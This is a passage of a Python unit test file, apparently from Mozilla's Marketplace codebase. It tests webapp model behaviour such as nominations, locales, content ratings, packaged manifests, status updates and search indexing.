app.versions.latest().update(nomination=None)
app.update(status=amo.STATUS_PENDING)
assert app.versions.latest().nomination
def test_nomination_rejected(self):
app = app_factory()
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().update(nomination=self.days_ago(1))
app.update(status=amo.STATUS_PENDING)
self.assertCloseToNow(app.versions.latest().nomination)
def test_nomination_pkg_pending_new_version(self):
# New versions while pending inherit version nomination.
app = app_factory()
app.update(status=amo.STATUS_PENDING, is_packaged=True)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
old_ver.all_files[0].update(status=amo.STATUS_PENDING)
v = Version.objects.create(addon=app, version='1.9')
eq_(v.nomination, old_ver.nomination)
def test_nomination_pkg_public_new_version(self):
# New versions while public get a new version nomination.
app = app_factory()
app.update(is_packaged=True)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
v = Version.objects.create(addon=app, version='1.9')
self.assertCloseToNow(v.nomination)
def test_nomination_public_waiting(self):
# New versions while public waiting get a new version nomination.
app = app_factory()
app.update(is_packaged=True, status=amo.STATUS_PUBLIC_WAITING)
old_ver = app.versions.latest()
old_ver.update(nomination=self.days_ago(1))
old_ver.all_files[0].update(status=amo.STATUS_PUBLIC_WAITING)
v = Version.objects.create(addon=app, version='1.9')
self.assertCloseToNow(v.nomination)
def test_excluded_in(self):
app1 = app_factory()
region = mkt.regions.BR
AddonExcludedRegion.objects.create(addon=app1, region=region.id)
eq_(get_excluded_in(region.id), [app1.id])
def test_supported_locale_property(self):
app = app_factory()
app.versions.latest().update(supported_locales='de,fr', _signal=False)
app.reload()
eq_(app.supported_locales,
(u'English (US)', [u'Deutsch', u'Fran\xe7ais']))
def test_supported_locale_property_empty(self):
app = app_factory()
eq_(app.supported_locales, (u'English (US)', []))
def test_supported_locale_property_bad(self):
app = app_factory()
app.versions.latest().update(supported_locales='de,xx', _signal=False)
app.reload()
eq_(app.supported_locales, (u'English (US)', [u'Deutsch']))
def test_supported_locale_app_rejected(self):
"""
Simulate an app being rejected, which sets the
app.current_version to None, and verify supported_locales works
as expected -- which is that if there is no current version we
can't report supported_locales for it, so we return an empty
list.
"""
app = app_factory()
app.versions.latest().update(supported_locales='de', _signal=False)
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().all_files[0].update(status=amo.STATUS_REJECTED)
app.update_version()
app.reload()
eq_(app.supported_locales, (u'English (US)', []))
def test_get_trending(self):
# Test no trending record returns zero.
app = app_factory()
eq_(app.get_trending(), 0)
# Add a region specific trending and test the global one is returned
# because the region is not mature.
region = mkt.regions.REGIONS_DICT['me']
app.trending.create(value=20.0, region=0)
app.trending.create(value=10.0, region=region.id)
eq_(app.get_trending(region=region), 20.0)
# Now test the regional trending is returned when adolescent=False.
region.adolescent = False
eq_(app.get_trending(region=region), 10.0)
def test_rated(self):
self.create_switch('iarc')
assert app_factory(rated=True).is_rated()
assert not app_factory().is_rated()
def test_set_content_ratings(self):
rb = mkt.ratingsbodies
app = app_factory()
app.set_content_ratings({})
assert not app.is_rated()
# Create.
app.set_content_ratings({
rb.CLASSIND: rb.CLASSIND_L,
rb.PEGI: rb.PEGI_3,
})
eq_(ContentRating.objects.count(), 2)
for expected in [(rb.CLASSIND.id, rb.CLASSIND_L.id),
(rb.PEGI.id, rb.PEGI_3.id)]:
assert ContentRating.objects.filter(
addon=app, ratings_body=expected[0],
rating=expected[1]).exists()
# Update.
app.set_content_ratings({
rb.CLASSIND: rb.CLASSIND_10,
rb.PEGI: rb.PEGI_3,
rb.GENERIC: rb.GENERIC_18,
})
eq_(ContentRating.objects.count(), 3)
for expected in [(rb.CLASSIND.id, rb.CLASSIND_10.id),
(rb.PEGI.id, rb.PEGI_3.id),
(rb.GENERIC.id, rb.GENERIC_18.id)]:
assert ContentRating.objects.filter(
addon=app, ratings_body=expected[0],
rating=expected[1]).exists()
def test_set_descriptors(self):
app = app_factory()
eq_(RatingDescriptors.objects.count(), 0)
app.set_descriptors([])
eq_(RatingDescriptors.objects.count(), 1)
descriptors = RatingDescriptors.objects.get(addon=app)
assert not descriptors.has_classind_drugs
assert not descriptors.has_esrb_blood # Blood-deuh!
# Create.
app.set_descriptors([
'has_classind_drugs', 'has_pegi_scary', 'has_generic_drug_ref'
])
eq_(RatingDescriptors.objects.count(), 1)
descriptors = RatingDescriptors.objects.get(addon=app)
assert descriptors.has_classind_drugs
assert descriptors.has_pegi_scary
assert descriptors.has_generic_drug_ref
assert not descriptors.has_esrb_blood
# Update.
app.set_descriptors([
'has_esrb_blood', 'has_classind_drugs'
])
eq_(RatingDescriptors.objects.count(), 1)
descriptors = RatingDescriptors.objects.get(addon=app)
assert descriptors.has_esrb_blood
assert descriptors.has_classind_drugs
assert not descriptors.has_pegi_scary
assert not descriptors.has_generic_drug_ref
def test_set_interactives(self):
app = app_factory()
app.set_interactives([])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert not app_interactives.has_shares_info
assert not app_interactives.has_digital_purchases
# Create.
app.set_interactives([
'has_shares_info', 'has_digital_PurChaSes', 'has_UWOTM8'
])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert app_interactives.has_shares_info
assert app_interactives.has_digital_purchases
assert not app_interactives.has_users_interact
# Update.
app.set_interactives([
'has_digital_content_portaL', 'has_digital_purchases',
'has_shares_ur_mum'
])
eq_(RatingInteractives.objects.count(), 1)
app_interactives = RatingInteractives.objects.get(addon=app)
assert not app_interactives.has_shares_info
assert app_interactives.has_digital_content_portal
assert app_interactives.has_digital_purchases
@mock.patch('lib.iarc.client.MockClient.call')
@mock.patch('mkt.webapps.models.render_xml')
def test_set_iarc_storefront_data(self, render_mock, storefront_mock):
# Set up ratings/descriptors/interactives.
self.create_switch('iarc')
app = app_factory(name='LOL')
app.set_iarc_info(submission_id='1234', security_code='sektor')
app.set_descriptors(['has_esrb_blood', 'has_pegi_scary'])
app.set_interactives(['has_users_interact', 'has_shares_info'])
app.set_content_ratings({
mkt.ratingsbodies.ESRB: mkt.ratingsbodies.ESRB_A,
mkt.ratingsbodies.PEGI: mkt.ratingsbodies.PEGI_3,
})
# Check the client was called.
app.set_iarc_storefront_data()
assert storefront_mock.called
eq_(render_mock.call_count, 2)
eq_(render_mock.call_args_list[0][0][0], 'set_storefront_data.xml')
# Check arguments to the XML template are all correct.
data = render_mock.call_args_list[0][0][1]
eq_(type(data['title']), unicode)
eq_(data['submission_id'], 1234)
eq_(data['security_code'], 'sektor')
eq_(data['rating'], 'Adults Only')
eq_(data['title'], 'LOL')
eq_(data['rating_system'], 'ESRB')
eq_(data['descriptors'], 'Blood')
self.assertSetEqual(data['interactive_elements'].split(', '),
['Shares Info', 'Users Interact'])
data = render_mock.call_args_list[1][0][1]
eq_(type(data['title']), unicode)
eq_(data['submission_id'], 1234)
eq_(data['security_code'], 'sektor')
eq_(data['rating'], '3+')
eq_(data['title'], 'LOL')
eq_(data['rating_system'], 'PEGI')
eq_(data['descriptors'], 'Fear')
def test_has_payment_account(self):
app = app_factory()
assert not app.has_payment_account()
user = UserProfile.objects.create(email='a', username='b')
payment = PaymentAccount.objects.create(
solitude_seller=SolitudeSeller.objects.create(user=user),
user=user)
AddonPaymentAccount.objects.create(addon=app, payment_account=payment)
assert app.has_payment_account()
@override_settings(SECRET_KEY='test')
def test_iarc_token(self):
app = Webapp()
app.id = 1
eq_(app.iarc_token(),
hashlib.sha512(settings.SECRET_KEY + str(app.id)).hexdigest())
class DeletedAppTests(amo.tests.ESTestCase):
def test_soft_deleted_no_current_version(self):
webapp = amo.tests.app_factory()
webapp._current_version = None
webapp.save()
webapp.delete()
eq_(webapp.current_version, None)
def test_soft_deleted_no_latest_version(self):
webapp = amo.tests.app_factory()
webapp._latest_version = None
webapp.save()
webapp.delete()
eq_(webapp.latest_version, None)
class TestExclusions(amo.tests.TestCase):
fixtures = fixture('prices')
def setUp(self):
self.app = Webapp.objects.create(premium_type=amo.ADDON_PREMIUM)
self.app.addonexcludedregion.create(region=mkt.regions.US.id)
def make_tier(self):
self.price = Price.objects.get(pk=1)
AddonPremium.objects.create(addon=self.app, price=self.price)
def test_not_premium(self):
ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
def test_premium(self):
self.make_tier()
ok_(mkt.regions.US.id in self.app.get_excluded_region_ids())
def test_premium_remove_tier(self):
self.make_tier()
(self.price.pricecurrency_set
.filter(region=mkt.regions.PL.id).update(paid=False))
ok_(mkt.regions.PL.id in self.app.get_excluded_region_ids())
class TestPackagedAppManifestUpdates(amo.tests.TestCase):
# Note: More extensive tests for `Addon.update_names` are in the Addon
# model tests.
fixtures = ['base/platforms']
def setUp(self):
self.webapp = amo.tests.app_factory(is_packaged=True,
default_locale='en-US')
self.webapp.name = {'en-US': 'Packaged App'}
self.webapp.save()
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_default_name_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo'}
self.trans_eq(self.webapp.name, 'en-US', 'Packaged App')
self.webapp.update_name_from_package_manifest()
self.webapp = Webapp.objects.get(pk=self.webapp.pk)
self.trans_eq(self.webapp.name, 'en-US', 'Yo')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_default_locale_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo', 'default_locale': 'fr'}
eq_(self.webapp.default_locale, 'en-US')
self.webapp.update_name_from_package_manifest()
eq_(self.webapp.default_locale, 'fr')
self.trans_eq(self.webapp.name, 'en-US', None)
self.trans_eq(self.webapp.name, 'fr', 'Yo')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_package_manifest_locales_change(self, get_manifest_json):
get_manifest_json.return_value = {'name': 'Yo',
'locales': {'es': {'name': 'es'},
'de': {'name': 'de'}}}
self.webapp.update_supported_locales()
eq_(self.webapp.current_version.supported_locales, 'de,es')
def test_update_name_from_package_manifest_version(self):
evil_manifest = {
'name': u'Evil App Name'
}
good_manifest = {
'name': u'Good App Name',
}
latest_version = version_factory(addon=self.webapp, version='2.3',
file_kw=dict(status=amo.STATUS_DISABLED))
current_version = self.webapp.current_version
AppManifest.objects.create(version=current_version,
manifest=json.dumps(good_manifest))
AppManifest.objects.create(version=latest_version,
manifest=json.dumps(evil_manifest))
self.webapp.update_name_from_package_manifest()
eq_(self.webapp.name, u'Good App Name')
class TestWebappVersion(amo.tests.TestCase):
fixtures = ['base/platforms']
def test_no_version(self):
eq_(Webapp().get_latest_file(), None)
def test_no_file(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
webapp._current_version = Version.objects.create(addon=webapp)
eq_(webapp.get_latest_file(), None)
def test_right_file(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
version = Version.objects.create(addon=webapp)
old_file = File.objects.create(version=version, platform_id=1)
old_file.update(created=datetime.now() - timedelta(days=1))
new_file = File.objects.create(version=version, platform_id=1)
webapp._current_version = version
eq_(webapp.get_latest_file().pk, new_file.pk)
class TestWebappManager(amo.tests.TestCase):
def setUp(self):
self.reviewed_eq = (lambda f=[]:
eq_(list(Webapp.objects.reviewed()), f))
self.listed_eq = (lambda f=[]: eq_(list(Webapp.objects.visible()), f))
def test_reviewed(self):
for status in amo.REVIEWED_STATUSES:
w = Webapp.objects.create(status=status)
self.reviewed_eq([w])
Webapp.objects.all().delete()
def test_unreviewed(self):
for status in amo.UNREVIEWED_STATUSES:
Webapp.objects.create(status=status)
self.reviewed_eq()
Webapp.objects.all().delete()
def test_listed(self):
# Public status, non-null current version, non-user-disabled.
w = app_factory(status=amo.STATUS_PUBLIC)
self.listed_eq([w])
def test_unlisted(self):
# Public, null current version, non-user-disabled.
w = Webapp.objects.create()
self.listed_eq()
# With current version but unreviewed.
Version.objects.create(addon=w)
self.listed_eq()
# And user-disabled.
w.update(disabled_by_user=True)
self.listed_eq()
def test_by_identifier(self):
w = Webapp.objects.create(app_slug='foo')
eq_(Webapp.objects.by_identifier(w.id), w)
eq_(Webapp.objects.by_identifier(str(w.id)), w)
eq_(Webapp.objects.by_identifier(w.app_slug), w)
with self.assertRaises(Webapp.DoesNotExist):
Webapp.objects.by_identifier('fake')
def test_rated(self):
self.create_switch('iarc')
rated = app_factory(rated=True)
app_factory()
eq_(Webapp.objects.count(), 2)
eq_(list(Webapp.objects.rated()), [rated])
class TestManifest(BaseWebAppTest):
def test_get_manifest_json(self):
webapp = self.post_addon()
assert webapp.current_version
assert webapp.current_version.has_files
with open(self.manifest, 'r') as mf:
manifest_json = json.load(mf)
eq_(webapp.get_manifest_json(), manifest_json)
class PackagedFilesMixin(amo.tests.AMOPaths):
def setUp(self):
self.package = self.packaged_app_path('mozball.zip')
def setup_files(self, filename='mozball.zip'):
# This assumes self.file exists.
if not storage.exists(self.file.file_path):
try:
# We don't care if these dirs exist.
os.makedirs(os.path.dirname(self.file.file_path))
except OSError:
pass
shutil.copyfile(self.packaged_app_path(filename),
self.file.file_path)
class TestPackagedModel(amo.tests.TestCase):
@mock.patch.object(settings, 'SITE_URL', 'http://hy.fr')
@mock.patch('lib.crypto.packaged.os.unlink', new=mock.Mock)
def test_create_blocklisted_version(self):
app = app_factory(name=u'Mozillaball ょ', app_slug='test',
is_packaged=True, version_kw={'version': '1.0',
'created': None})
app.create_blocklisted_version()
app = app.reload()
v = app.versions.latest()
f = v.files.latest()
eq_(app.status, amo.STATUS_BLOCKED)
eq_(app.versions.count(), 2)
eq_(v.version, 'blocklisted-1.0')
eq_(app._current_version, v)
assert 'blocklisted-1.0' in f.filename
eq_(f.status, amo.STATUS_BLOCKED)
# Check manifest.
url = app.get_manifest_url()
res = self.client.get(url)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
assert 'etag' in res._headers
data = json.loads(res.content)
eq_(data['name'], 'Blocked by Mozilla')
eq_(data['version'], 'blocklisted-1.0')
eq_(data['package_path'], 'http://hy.fr/downloads/file/%s/%s' % (
f.id, f.filename))
class TestPackagedManifest(BasePackagedAppTest):
def _get_manifest_json(self):
zf = zipfile.ZipFile(self.package)
data = zf.open('manifest.webapp').read()
zf.close()
return json.loads(data)
def test_get_manifest_json(self):
webapp = self.post_addon()
eq_(webapp.status, amo.STATUS_NULL)
assert webapp.current_version
assert webapp.current_version.has_files
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(), mf)
def test_get_manifest_json_w_file(self):
webapp = self.post_addon()
eq_(webapp.status, amo.STATUS_NULL)
assert webapp.current_version
assert webapp.current_version.has_files
file_ = webapp.current_version.all_files[0]
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(file_), mf)
def test_get_manifest_json_multiple_versions(self):
# Post the real app/version, but backfill an older version.
webapp = self.post_addon()
webapp.update(status=amo.STATUS_PUBLIC, _current_version=None)
version = version_factory(addon=webapp, version='0.5',
created=self.days_ago(1))
version.files.update(created=self.days_ago(1))
webapp = Webapp.objects.get(pk=webapp.pk)
webapp.update_version()
assert webapp.current_version
assert webapp.current_version.has_files
mf = self._get_manifest_json()
eq_(webapp.get_manifest_json(), mf)
def test_get_manifest_json_multiple_version_disabled(self):
# Post an app, then emulate a reviewer reject and add a new, pending
# version.
webapp = self.post_addon()
webapp.latest_version.files.update(status=amo.STATUS_DISABLED)
webapp.latest_version.update(created=self.days_ago(1))
webapp.update(status=amo.STATUS_REJECTED, _current_version=None)
version = version_factory(addon=webapp, version='2.0',
file_kw=dict(status=amo.STATUS_PENDING))
mf = self._get_manifest_json()
AppManifest.objects.create(version=version,
manifest=json.dumps(mf))
webapp.update_version()
webapp = webapp.reload()
eq_(webapp.latest_version, version)
self.file = version.all_files[0]
self.setup_files()
eq_(webapp.get_manifest_json(), mf)
def test_cached_manifest_is_cached(self):
webapp = self.post_addon()
# First call does queries and caches results.
webapp.get_cached_manifest()
# Subsequent calls are cached.
with self.assertNumQueries(0):
webapp.get_cached_manifest()
def test_cached_manifest_contents(self):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
version = webapp.current_version
self.file = version.all_files[0]
self.setup_files()
manifest = self._get_manifest_json()
data = json.loads(webapp.get_cached_manifest())
eq_(data['name'], webapp.name)
eq_(data['version'], webapp.current_version.version)
eq_(data['size'], self.file.size)
eq_(data['release_notes'], version.releasenotes)
eq_(data['package_path'], absolutify(
os.path.join(reverse('downloads.file', args=[self.file.id]),
self.file.filename)))
eq_(data['developer'], manifest['developer'])
eq_(data['icons'], manifest['icons'])
eq_(data['locales'], manifest['locales'])
@mock.patch.object(packaged, 'sign', mock_sign)
def test_package_path(self):
webapp = self.post_addon(
data={'packaged': True, 'free_platforms': 'free-firefoxos'})
version = webapp.current_version
file = version.all_files[0]
res = self.client.get(file.get_url_path('manifest'))
eq_(res.status_code, 200)
eq_(res['content-type'], 'application/zip')
def test_packaged_with_BOM(self):
# Exercise separate code paths to loading the packaged app manifest.
self.setup_files('mozBOM.zip')
assert WebAppParser().parse(self.file.file_path)
self.assertTrue(self.app.has_icon_in_manifest())
class TestDomainFromURL(unittest.TestCase):
def test_simple(self):
eq_(Webapp.domain_from_url('http://mozilla.com/'),
'http://mozilla.com')
def test_long_path(self):
eq_(Webapp.domain_from_url('http://mozilla.com/super/rad.webapp'),
'http://mozilla.com')
def test_no_normalize_www(self):
eq_(Webapp.domain_from_url('http://www.mozilla.com/super/rad.webapp'),
'http://www.mozilla.com')
def test_with_port(self):
eq_(Webapp.domain_from_url('http://mozilla.com:9000/'),
'http://mozilla.com:9000')
def test_subdomains(self):
eq_(Webapp.domain_from_url('http://apps.mozilla.com/'),
'http://apps.mozilla.com')
def test_https(self):
eq_(Webapp.domain_from_url('https://mozilla.com/'),
'https://mozilla.com')
def test_normalize_case(self):
eq_(Webapp.domain_from_url('httP://mOzIllA.com/'),
'http://mozilla.com')
@raises(ValueError)
def test_none(self):
Webapp.domain_from_url(None)
@raises(ValueError)
def test_empty(self):
Webapp.domain_from_url('')
def test_empty_or_none(self):
eq_(Webapp.domain_from_url(None, allow_none=True), None)
class TestTransformer(amo.tests.TestCase):
fixtures = ['webapps/337141-steamcube']
def setUp(self):
self.device = DEVICE_TYPES.keys()[0]
@mock.patch('mkt.webapps.models.Addon.transformer')
def test_addon_transformer_called(self, transformer):
transformer.return_value = {}
list(Webapp.objects.all())
assert transformer.called
def test_device_types(self):
AddonDeviceType.objects.create(addon_id=337141,
device_type=self.device)
webapps = list(Webapp.objects.filter(id=337141))
with self.assertNumQueries(0):
for webapp in webapps:
assert webapp._device_types
eq_(webapp.device_types, [DEVICE_TYPES[self.device]])
def test_device_type_cache(self):
webapp = Webapp.objects.get(id=337141)
webapp._device_types = []
with self.assertNumQueries(0):
eq_(webapp.device_types, [])
class TestIsComplete(amo.tests.TestCase):
def setUp(self):
self.device = DEVICE_TYPES.keys()[0]
self.cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
self.webapp = Webapp.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_NULL)
def fail(self, value):
can, reasons = self.webapp.is_complete()
eq_(can, False)
assert value in reasons[0], reasons
def test_fail(self):
self.fail('email')
self.webapp.support_email = 'a@a.com'
self.webapp.save()
self.fail('name')
self.webapp.name = 'name'
self.webapp.save()
self.fail('device')
self.webapp.addondevicetype_set.create(device_type=self.device)
self.webapp.save()
self.fail('category')
AddonCategory.objects.create(addon=self.webapp, category=self.cat)
self.fail('screenshot')
self.webapp.previews.create()
eq_(self.webapp.is_complete()[0], True)
class TestAddonExcludedRegion(amo.tests.WebappTestCase):
def setUp(self):
super(TestAddonExcludedRegion, self).setUp()
self.excluded = self.app.addonexcludedregion
eq_(list(self.excluded.values_list('id', flat=True)), [])
self.er = self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
eq_(list(self.excluded.values_list('id', flat=True)), [self.er.id])
def test_exclude_multiple(self):
other = AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
self.assertSetEqual(self.excluded.values_list('id', flat=True),
[self.er.id, other.id])
def test_remove_excluded(self):
self.er.delete()
eq_(list(self.excluded.values_list('id', flat=True)), [])
def test_get_region(self):
eq_(self.er.get_region(), mkt.regions.UK)
def test_unicode(self):
eq_(unicode(self.er), '%s: %s' % (self.app, mkt.regions.UK.slug))
class TestContentRating(amo.tests.WebappTestCase):
def setUp(self):
self.app = self.get_app()
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.CLASSIND,))
@mock.patch.object(mkt.regions.US, 'ratingsbodies',
(mkt.ratingsbodies.ESRB,))
@mock.patch.object(mkt.regions.VE, 'ratingsbodies',
(mkt.ratingsbodies.GENERIC,))
def test_get_regions_and_slugs(self):
classind_rating = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
regions = classind_rating.get_regions()
assert mkt.regions.BR in regions
assert mkt.regions.US not in regions
assert mkt.regions.VE not in regions
slugs = classind_rating.get_region_slugs()
assert mkt.regions.BR.slug in slugs
assert mkt.regions.US.slug not in slugs
assert mkt.regions.VE.slug not in slugs
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.CLASSIND,))
@mock.patch.object(mkt.regions.DE, 'ratingsbodies',
(mkt.ratingsbodies.ESRB,))
@mock.patch.object(mkt.regions.VE, 'ratingsbodies',
(mkt.ratingsbodies.GENERIC,))
def test_get_regions_and_slugs_generic_fallback(self):
gen_rating = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=0)
regions = gen_rating.get_regions()
assert mkt.regions.BR not in regions
assert mkt.regions.DE not in regions
assert mkt.regions.VE in regions
slugs = gen_rating.get_region_slugs()
assert mkt.regions.BR.slug not in slugs
assert mkt.regions.DE.slug not in slugs
assert mkt.regions.VE.slug not in slugs
# We have a catch-all 'generic' region for all regions wo/ r.body.
assert mkt.regions.GENERIC_RATING_REGION_SLUG in slugs
@mock.patch.object(mkt.ratingsbodies.CLASSIND, 'name', 'CLASSIND')
@mock.patch.object(mkt.ratingsbodies.CLASSIND_10, 'name', '10+')
@mock.patch.object(mkt.ratingsbodies.ESRB_E, 'name', 'Everybody 10+')
@mock.patch.object(mkt.ratingsbodies.ESRB_E, 'slug', '10')
def test_get_ratings(self):
# Infer the slug from the name.
cr = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=mkt.ratingsbodies.CLASSIND_10.id)
eq_(cr.get_rating().slug, '10')
eq_(cr.get_body().slug, 'classind')
# When already has slug set.
eq_(ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.ESRB.id,
rating=mkt.ratingsbodies.ESRB_E.id).get_rating().slug,
'10')
class TestContentRatingsIn(amo.tests.WebappTestCase):
def test_not_in_region(self):
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region), [])
for region in mkt.regions.ALL_REGIONS:
AddonExcludedRegion.objects.create(addon=self.app,
region=region.id)
eq_(self.get_app().content_ratings_in(region=region), [])
def test_in_for_region_and_category(self):
cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region, category='games'),
[])
eq_(self.app.content_ratings_in(region=region, category=cat), [])
def test_in_region_and_category(self):
self.make_game()
cat = Category.objects.get(slug='games')
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.listed_in(region=region, category='games'), True)
eq_(self.app.listed_in(region=region, category=cat),
True)
def test_in_region_and_not_in_category(self):
cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
for region in mkt.regions.ALL_REGIONS:
eq_(self.app.content_ratings_in(region=region, category='games'),
[])
eq_(self.app.content_ratings_in(region=region, category=cat), [])
@mock.patch.object(mkt.regions.CO, 'ratingsbodies', ())
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.CLASSIND,))
def test_generic_fallback(self):
# Test region with no rating body returns generic content rating.
crs = ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=mkt.ratingsbodies.GENERIC_3.id)
eq_(self.app.content_ratings_in(region=mkt.regions.CO), [crs])
# Test region with rating body does not include generic content rating.
assert crs not in self.app.content_ratings_in(region=mkt.regions.BR)
class TestIARCInfo(amo.tests.WebappTestCase):
def test_no_info(self):
with self.assertRaises(IARCInfo.DoesNotExist):
self.app.iarc_info
def test_info(self):
IARCInfo.objects.create(addon=self.app, submission_id=1,
security_code='s3kr3t')
eq_(self.app.iarc_info.submission_id, 1)
eq_(self.app.iarc_info.security_code, 's3kr3t')
class TestQueue(amo.tests.WebappTestCase):
def test_in_queue(self):
assert not self.app.in_rereview_queue()
RereviewQueue.objects.create(addon=self.app)
assert self.app.in_rereview_queue()
class TestPackagedSigning(amo.tests.WebappTestCase):
@mock.patch('lib.crypto.packaged.sign')
def test_not_packaged(self, sign):
self.app.update(is_packaged=False)
assert not self.app.sign_if_packaged(self.app.current_version.pk)
assert not sign.called
@mock.patch('lib.crypto.packaged.sign')
def test_packaged(self, sign):
self.app.update(is_packaged=True)
assert self.app.sign_if_packaged(self.app.current_version.pk)
eq_(sign.call_args[0][0], self.app.current_version.pk)
@mock.patch('lib.crypto.packaged.sign')
def test_packaged_reviewer(self, sign):
self.app.update(is_packaged=True)
assert self.app.sign_if_packaged(self.app.current_version.pk,
reviewer=True)
eq_(sign.call_args[0][0], self.app.current_version.pk)
eq_(sign.call_args[1]['reviewer'], True)
class TestUpdateStatus(amo.tests.TestCase):
def setUp(self):
# Disabling signals to simplify these tests and because create doesn't
# call the signals anyway.
version_changed_signal.disconnect(version_changed,
dispatch_uid='version_changed')
post_save.disconnect(update_status, sender=Version,
dispatch_uid='version_update_status')
post_delete.disconnect(update_status, sender=Version,
dispatch_uid='version_update_status')
def tearDown(self):
version_changed_signal.connect(version_changed,
dispatch_uid='version_changed')
post_save.connect(update_status, sender=Version,
dispatch_uid='version_update_status')
post_delete.connect(update_status, sender=Version,
dispatch_uid='version_update_status')
def test_no_versions(self):
app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_version_no_files(self):
app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Version(addon=app).save()
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_only_version_deleted(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_NULL)
def test_other_version_deleted(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
amo.tests.version_factory(addon=app)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_REJECTED)
def test_one_version_pending(self):
app = amo.tests.app_factory(status=amo.STATUS_REJECTED,
file_kw=dict(status=amo.STATUS_DISABLED))
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
app.update_status()
eq_(app.status, amo.STATUS_PENDING)
def test_one_version_public(self):
app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_DISABLED))
app.update_status()
eq_(app.status, amo.STATUS_PUBLIC)
def test_was_public_waiting_then_new_version(self):
app = amo.tests.app_factory(status=amo.STATUS_PUBLIC_WAITING)
File.objects.filter(version__addon=app).update(status=app.status)
amo.tests.version_factory(addon=app,
file_kw=dict(status=amo.STATUS_PENDING))
app.update_status()
eq_(app.status, amo.STATUS_PUBLIC_WAITING)
def test_blocklisted(self):
app = amo.tests.app_factory(status=amo.STATUS_BLOCKED)
app.current_version.delete()
app.update_status()
eq_(app.status, amo.STATUS_BLOCKED)
class TestInstalled(amo.tests.TestCase):
def setUp(self):
user = UserProfile.objects.create(email='f@f.com')
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
self.m = functools.partial(Installed.objects.safer_get_or_create,
user=user, addon=app)
def test_install_type(self):
assert self.m(install_type=apps.INSTALL_TYPE_USER)[1]
assert not self.m(install_type=apps.INSTALL_TYPE_USER)[1]
assert self.m(install_type=apps.INSTALL_TYPE_REVIEWER)[1]
class TestAppFeatures(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestAppFeatures, self).setUp()
self.create_switch('buchets')
self.model = AppFeatures
self.related_name = 'features'
self.BOOL_DICT = mkt.constants.features.APP_FEATURES
self.flags = ('APPS', 'GEOLOCATION', 'PAY', 'SMS')
self.expected = [u'App Management API', u'Geolocation', u'Web Payment',
u'WebSMS']
self.af = AppFeatures.objects.get()
def _get_related_bool_obj(self):
return getattr(self.app.current_version, self.related_name)
def test_signature_parity(self):
# Test flags -> signature -> flags works as expected.
self._flag()
signature = self.app.current_version.features.to_signature()
eq_(signature.count('.'), 2, 'Unexpected signature format')
self.af.set_flags(signature)
self._check(self.af)
def test_bad_data(self):
self.af.set_flags('foo')
self.af.set_flags('<script>')
def test_default_false(self):
obj = self.model(version=self.app.current_version)
eq_(getattr(obj, 'has_%s' % self.flags[0].lower()), False)
class TestWebappIndexer(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
def test_mapping_type_name(self):
eq_(WebappIndexer.get_mapping_type_name(), 'webapp')
def test_index(self):
with self.settings(ES_INDEXES={'webapp': 'apps'}):
eq_(WebappIndexer.get_index(), 'apps')
def test_model(self):
eq_(WebappIndexer.get_model(), Webapp)
def test_mapping(self):
mapping = WebappIndexer.get_mapping()
eq_(mapping.keys(), ['webapp'])
eq_(mapping['webapp']['_all'], {'enabled': False})
eq_(mapping['webapp']['_boost'], {'name': '_boost', 'null_value': 1.0})
def test_mapping_properties(self):
